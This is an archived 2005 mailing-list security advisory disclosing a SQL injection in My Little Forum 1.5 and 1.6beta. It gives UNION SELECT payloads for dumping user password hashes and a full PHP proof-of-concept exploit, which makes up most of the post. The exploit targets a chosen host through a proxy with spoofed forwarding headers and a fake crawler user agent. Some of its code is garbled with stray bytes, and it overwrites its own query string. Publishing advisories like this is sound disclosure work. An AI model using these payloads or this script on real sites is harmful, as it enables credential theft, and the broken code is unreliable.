Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY LINKS NEWS MAN DOCUMENTATION

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Date: Thu, 22 Sep 2005 16:19:19 -0400
To: [email protected]
Subject: My Little Forum 1.5 / 1.6beta SQL Injection
From: [email protected]
X-Mailer: GWAVA Archive Mailer
Content-Type: multipart/mixed;
        boundary="----=_NextPart_457_3b23_969443c3.afc0f902_.MIX"
Message-ID: <CHILKAT-MID-2a3f3ee5-f857-42b5-9de4-4ed0f2ab38b6@George_NewPC.Redsoft-2000.com.>
X-Virus-Scanned: antivirus-gw at tyumen.ru

This is a multi-part message in MIME format.

------=_NextPart_457_3b23_969443c3.afc0f902_.MIX
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

My Little Forum 1.5 / 1.6beta SQL Injection

software:
site: http://www.mylittlehomepage.net/my_little_forum
software: "A simple web-forum that supports classical thread view (messa=
ge tree)
as well as messagebord view to display the messages.
Requires PHP > 4.1 and a MySQL database."


1) look at the vulnerable code at line 144 inside search.php:
=2E..
 $result =3D mysql_query("SELECT id, pid, tid, DATE_FORMAT(time + INTERV=
AL ".
 $time_difference." HOUR,'".$lang['time_format']."') AS Uhrzeit,
 DATE_FORMAT(time + INTERVAL ".$time_difference." HOUR, '".$lang['time_f=
ormat']."')
 AS Datum, subject, name, email, hp, place, text, category FROM ".$forum=
_table."
 WHERE ".$search_string." ORDER BY tid DESC, time ASC LIMIT ".$ul.", "
 .$settings['search_results_per_page'], $connid);
=2E..

now goto the search page, select "phrase", and type:

[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, u=
ser_pw,
user_pw, user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata=
 where
user_name=3D'[username]' /*

if magic quotes are off you will have (guess?...) any admin/user passwor=
d hash
'cause $searchstring var is not filtered...

this my poc exploit:

<?php
#   mlfexpl.php                                                         =
       #
#                                                                       =
       #
#   My Little Forum 1.5 ( possibly prior versions) SQL Injection /      =
       #
#   MD5 password hash disclosure poc exploit with proxy support         =
       #
#                                                                       =
       #
#                                by rgod                                =
       #
#                      site: http://rgod.altervista.org                 =
       #
#                                                                       =
       #
#   make these changes in php.ini if you have troubles                  =
       #
#   to launch this script:                                              =
       #
#   allow_call_time_pass_reference =3D on                               =
         #
#   register_globals =3D on                                             =
         #
#                                                                       =
       #
#   usage: launch this script from Apache, fill requested fields, then..=
=2E      #
#   dump all password hashes from database right now...                 =
       #
#                                                                       =
       #
#   Sun-Tzu: "You can be sure of succeeding in your attacks if you only =
attack #
#   places which are undefended. You can ensure the safety of your defen=
se if  #
#   you only hold positions that cannot be attacked."                   =
       #

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

echo'<head><title>My Little Forum 1.5 SQL Injection </title><meta http-e=
quiv=3D"Co
ntent-Type"  content=3D"text/html; charset=3Diso-8859-1"><style type=3D"=
text/css"><!--
body,td,th {   color:  #00FF00;} body {  background-color: #000000;} .St=
ile5   {
font-family: Verdana, Arial, Helvetica,  sans-serif; font-size: 10px;}  =
=2EStile6{
font-family: Verdana, Arial, Helvetica, sans-serif; font-weight:  bold; =
font-sty
le: italic; } --> </style></head> <body> <p class=3D"Stile6">  My   Litt=
le Forum 1
=2E5 SQL Injection </p><p class=3D"Stile6">a script by rgod at <a href=3D=
"http: //rgod
=2Ealtervista.org"    target=3D"_blank" > http://rgod.altervista.org </a=
> </p><table
width=3D"84%"><tr><td width=3D"43%">  <form  name=3D"form1"  method=3D"p=
ost"   action=3D"'
=2E$SERVER[PHP_SELF].'?path=3Dvalue&host=3Dvalue&port=3Dvalue&proxy=3Dva=
lue&username=3Dvalue
"><p><input type=3D"text" name=3D"host"><span class=3D"Stile5">hostname =
(ex: www.siten
ame.com) </span></p><p><input type=3D"text"    name=3D"path">  <span cla=
ss=3D"Stile5">
path (ex: /mylf/ or just /) </span></p><p><input type=3D"text"  name=3D"=
port" ><span
class=3D"Stile5"> specify a port other than 80 (default value)</span></p=
><p><input
type=3D"text" name=3D"proxy"> <span class=3D"Stile5"> send  exploit  thr=
ough  an  HTTP
proxy (ip:port) </span> </p> <p> <input type=3D"text" name=3D"username">=
 <span class
=3D"Stile5">username whom you want MD5 hash </span> </p> <p> <input  typ=
e=3D"submit"
name=3D"Submit" value=3D"go!"></p></form></td></tr></table></body>';

function show($headeri)
{
$ii=3D0;
$ji=3D0;
$ki=3D0;
$ci=3D0;
echo '<table border=3D"0"><tr>';
while ($ii <=3D strlen($headeri)-1)
{
$datai=3Ddechex(ord($headeri[$ii]));
if ($ji=3D=3D16) {
             $ji=3D0;
             $ci++;
             echo "<td>&nbsp;&nbsp;</td>";
             for ($li=3D0; $li<=3D15; $li++)
                      { echo "<td>".$headeri[$li+$ki]."</td>";
=E0=11=0C=0C=E0    }
            $ki=3D$ki+16;
            echo "</tr><tr>";
            }
if (strlen($datai)=3D=3D1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=3D1; $li<=3D(16 - (strlen($headeri) % 16)+1); $li++)
                      { echo "<td>&nbsp&nbsp</td>";
                       }

for ($li=3D$ci*16; $li<=3Dstrlen($headeri); $li++)
                      { echo "<td>".$headeri[$li]."</td>";
=E0=11=0C=0C=E0    }
echo "</tr></table>";
}

$proxy_regex =3D '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacket($packet,$show)
{
global $proxy, $host, $port, $html;
if ($proxy=3D=3D'')
           {$ock=3Dfsockopen(gethostbyname($host),$port);}
             else
           {
    if (!eregi($proxy_regex,$proxy))
    {echo htmlentities($proxy).' -> not a valid proxy...';
     die;
    }
   $parts=3Dexplode(':',$proxy);
    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
    $ock=3Dfsockopen($parts[0],$parts[1]);
    if (!$ock) { echo 'No response from proxy...';
=E0=11=0C=0C=E0die;
=E0=11=0C=0C=E0       }
   }
fputs($ock,$packet);
if ($proxy=3D=3D'')
  {

    $html=3D'';
    while (!feof($ock))
      {
        $html.=3Dfgets($ock);
      }
  }
else
  {
    $html=3D'';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x=
0a),$html)))
    {
      $html.=3Dfread($ock,1);
    }
  }
fclose($ock);
if ($show) {echo nl2br(htmlentities($html));}
}

if (($path<>'') and ($host<>'') and ($username<>''))
{
  if ($port=3D=3D'') {$port=3D80;}


$sql=3D"%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, use=
r_pw, user_pw, user_pw, user_pw, user_pw, user_pw";
$sql=3D", user_pw"; //if version is 1.6 beta, just add a comment to ths =
line
$sql=3D" FROM forum_userdata WHERE user_name=3D'".$username."'/*";
$sql=3Durlencode($sql);

if ($proxy=3D=3D'')
{$packet=3D"GET ".$path."search.php?search=3D".$sql."&ao=3Dphrase HTTP/1=
=2E1\r\n";}
else
{$packet=3D"GET http://".$host.$path."search.php?search=3D".$sql."&ao=3D=
phrase HTTP/1.1\r\n";}
$packet.=3D"Client-IP: 127.0.0.1\r\n";
$packet.=3D"X-Forwarded-For: 127.0.0.1\r\n";
$packet.=3D"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,=
 application/x-shockwave-flash, application/msword, */*\r\n";
$packet.=3D"Referer: http://".$host.$path."search.php\r\n";
$packet.=3D"Accept-Language: en\r\n";
$packet.=3D"Accept-Encoding: gzip, deflate\r\n";
$packet.=3D"User-Agent: Baiduspider+(+http://www.baidu.com/search/spider=
=2Ehtm)\r\n";
$packet.=3D"Host: ".$host."\r\n";
$packet.=3D"Connection: Keep-Alive\r\n\r\n";
show($packet);
sendpacket($packet,0);
$temp=3Dexplode(';<span class=3D"category">(',$html);
$temp2=3Dexplode(')</span>',$temp[1]);
$hash=3D$temp2[0];

echo '<br>username: '.$username.' hash: '.$hash;
# debugging...
//echo htmlentities($html);
}
else
{
echo '<br>fill in all requested fields, optionally specify a proxy...<br=
>';
}
?>




2) 1.6beta is vulnerable even, we have:
=2E..
$result =3D mysql_query("SELECT id, pid, tid, UNIX_TIMESTAMP(time + INTE=
RVAL ".$time_difference." HOUR) AS
Uhrzeit, subject, name, email, hp, place, text, category FROM ".$db_sett=
ings['forum_table']."
WHERE ".$search_string." ORDER BY tid DESC, time ASC LIMIT ".$ul.", ".$s=
ettings['search_results_per_page'],
$connid);
=2E..

you have same results, deleting a statement in injection string:

[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, u=
ser_pw,
user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata where
user_name=3D'[username]' /*


rgod

site: http://rgod.altervista.org
mail: retrogod at aliceposta it
original advisory: http://rgod.altervista.org/mylittle15_16b.html








------=_NextPart_457_3b23_969443c3.afc0f902_.MIX
Content-Type: text/plain;
        name="GWAVADAT.TXT"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment; filename="GWAVADAT.TXT"

AdmID:6354226D92B40391410E7F8609135F12

------=_NextPart_457_3b23_969443c3.afc0f902_.MIX--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Партнёры:

Хостинг: